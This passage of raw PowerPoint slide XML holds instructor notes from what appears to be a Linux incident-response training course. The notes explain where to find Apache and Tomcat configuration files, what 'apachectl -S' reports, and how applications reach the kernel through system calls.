              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Last item to mention is application logs, which are also a great place to investigate. Depending on the application will determine where specific logs go. The lesson will discuss more about application logs later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17008004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type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1980424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next few slides are intended to build upon all the Linux concepts covered up to this point. The lesson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> walk through the different applications and work to answer the following questions on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>lide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>NOTE: This is a great opportunity to leverage student knowledge and experience. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Write the questions on whiteboard and use as reference throughout. As we answer these questions, keep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in mind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>there are multiple paths to answer the questions. The lesson will attempt to show one, but realize there </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> more.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2558230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type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="855888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3713" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556816" y="944563"/>
            <a:ext cx="5888736" cy="7614150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Numerous programming </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>languages are available </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for Linux, as well as more </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>than 70</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>000 different </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>applications. Applications </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>are installed from </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>packages, which contain </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the application itself and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>metadata about the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>application.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> The list and number of applications that could encompass this list could be extensive. Here you can see a few. The challenges that could be added when conducting an investigation or incident response could vary greatly depending on the application. Each application on the system could increase the attack surface, create a new attack vector, add vulnerabilities or contain artifacts for a potential compromise. Seeing as applications can vary widely (even amongst versions), this can create a challenge for any operator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>While there are a number of applications in the wild, the Air Force has a number of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>own applications that run on Linux. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Global Command and Control System is a system of systems for Joint services to conduct command and control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Deliberate and Crisis Action Planning and Execution </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Segments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (DCAPES) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>is an interface to the Joint Operational Planning and Execution System for tracking everything deployment tasking related.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Applications running on the system communicate with the Kernel via system calls. An application typically calls functions in a library (for example, the C library,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>that in turn rely on the system call interface to instruct the Kernel to carry out tasks on behalf of application).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5812063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Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> web server is an extremely powerful and open-source web server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Tomcat is an application server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>NGINX is another one.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>PS and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> checks are quick checks to show Apache is installed and running. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="931821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13075" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556816" y="944563"/>
            <a:ext cx="5888736" cy="7614149"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The first bullet contains </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>some default installation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>items, such as the Apache </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>configuration file. This will </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vary depending on the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>distribution, but the above </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>paths are where it should </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>most likely be posted. The </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (in the screenshot, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the apache2.conf) is the main configuration file. It pulls the pieces together by including all remaining configuration files when starting up a web server. Other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>configs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of interest, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ports.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to determine listening ports for incoming connections. Files in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>mods-enabled, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-enabled and sites-enabled contain particular configuration snippets which manage modules, global configuration fragments or virtual host configurations. All these </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>configs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can be easily seen with a text editor and searched through.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="578"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If unsure where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file is located, the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>apachectl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’ command is an apache http server control interface. Running this command with the -S argument shows the settings as parsed from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file to include its location on the system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="578"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>On the slide, notice the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>apachctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> -S returned the location of the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/apache2 of where the server root is at allowing you to find the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file. Additionally, it shows a few more items of interest.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="578"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The first item is a homepage file that is installed at /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/www$ directory that has an index.html file. This is the default homepage that will normally be updated by a web owner. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="578"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The other part that makes Apache powerful and flexible is its ability to allow extensions through modules. These modules can allow scripts, incorporate interpreters, authenticate users, pass FTP connections, etc. Mods-enabled allows you to see which mods are in use and enabled for the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="578"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37719440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Apache Server Control Interface has a lot of options, but it is a quick way to identify key information in Apache. The screenshot is just a portion of some of the key information that the -S argument brings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ServerRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ServerRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> directive sets the directory in which the server lives. Typically it will contain the subdirectories </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ and logs/. Default of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ServerRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/local/apache2.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DocumentRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> directive sets the directory from which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will serve files. Unless matched by a directive like Alias, the server appends the path from the requested URL to the document root to make the path to the current document. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The Main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Errorlog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is another directive to highlight. This directive will set the name of the file to which the server will log any errors it encounters. Additional modules can provide their own </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ErrorLog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> providers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>PidFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> directive sets the file to which the server records the process ID of the daemon.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Of additional note and checking is whether the server is running as root or user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18139067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Tomcat is an HTTP server, but Tomcat is also a servlet container that can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> execute a Java Servlet, and converting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>JavaServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Pages (JSP) and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>JavaServerFaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (JSF) to Java Servlet. Tomcat employs a hierarchical and modular architecture as illustrated. Tomcat’s binaries and startup scripts are default in the bin directory. Like most servers, the configuration can be found in multiple files. A couple important ones are highlighted here, but this is not all-inclusive. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Catalina security policy implements and configures the Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SecurityManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. It replaces the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>java.policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file and can be edited by hand or edited via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>policytool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> application that comes with </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Java 1.2 or later. The Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SecurityManager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is what allows a web browser to run an applet in its own sandbox to prevent untrusted code from accessing files on the local file system, connecting to a host other than the one the applet was loaded from, and so on. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Tomcats main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file is the ‘server.xml’. This covers the major components of the Tomcat server and its respective configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Element: This element represents the entire Tomcat container. It is used as a top-level element for a single Tomcat instance. Its defined by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>org.apache.catalina.Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> interface. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Notes continued on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>ext page).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40014259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556816" y="882503"/>
            <a:ext cx="5888736" cy="7676210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Notes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
